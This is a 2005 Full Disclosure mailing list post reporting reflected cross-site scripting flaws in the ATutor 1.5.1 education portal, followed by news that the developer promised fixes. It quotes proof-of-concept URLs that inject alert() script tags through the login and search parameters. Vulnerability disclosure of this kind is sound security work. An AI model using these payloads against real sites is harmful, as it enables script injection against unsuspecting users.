Full Disclosure mailing list archives

Re: ATutor 1.5.1 and prior multiple XSS Vulnerabilities

From: h4cky0u <h4cky0u.org () gmail com>
Date: Thu, 18 Aug 2005 18:58:32 +0530

Just to let all of you know, after i shared this bug (ATutor 1.5.1 and
prior multiple XSS Vulnerabilities) with you all, i just received an
email today from the developer of this product in reply to the
notification i sent him indicating the weaknesses. He has assured me
that the bugs have been fixed and the fixes will be included in the
next release of atutor which is scheduled sometime later.

On 8/18/05, h4cky0u <h4cky0u.org () gmail com> wrote:

ATutor 1.5.1 and prior multiple XSS Vulnerabilities

SEVERITY:
=========
Medium

SOFTWARE:
=========
ATutor 1.5.1
http://www.atutor.ca/

INFO:
=====
ATutor 1.5.1 is a web based education portal.

DESCRIPTION:
============
The system is vulnerable to various XSS attacks:


--==XSS==--

Some examples -

http://localhost/tour/login.php?course=";><script>alert('Matrix_Killer
r0X');</script>

http://localhost/tour/search.php?search=1&search=1&words=";><script>alert('There
is no other place like
127.0.0.1');</script>&include=all&find_in=all&display_as=pages

http://localhost/tour/search.php?search=1&words=";><script>alert('Found
By matrix_killer');</script>&include=all&find_in=all&display_as=pages&submit=Search

VENDOR STATUS:
==============
Vendor was contacted but no response received till date.

CREDITS:
========
This vulnerability was discovered and researched by
matrix_killer of  h4cky0u Security Forums.

mail : matrix_k at abv.bg

web : http://www.h4cky0u.org


Co-Researcher:
h4cky0u of h4cky0u Security Forums.

mail : h4cky0u at gmail.com

web : http://www.h4cky0u.org

Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!

ORIGINAL:
=========
http://h4cky0u.org/viewtopic.php?t=2094

--
http://www.h4cky0u.org
(In)Security at its best...



-- 
http://www.h4cky0u.org
(In)Security at its best...
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

ATutor 1.5.1 and prior multiple XSS Vulnerabilities h4cky0u (Aug 18)
- Re: ATutor 1.5.1 and prior multiple XSS Vulnerabilities h4cky0u (Aug 18)
- <Possible follow-ups>
- Re:Re: ATutor 1.5.1 and prior multiple XSS Vulnerabilities mayank priya (Aug 21)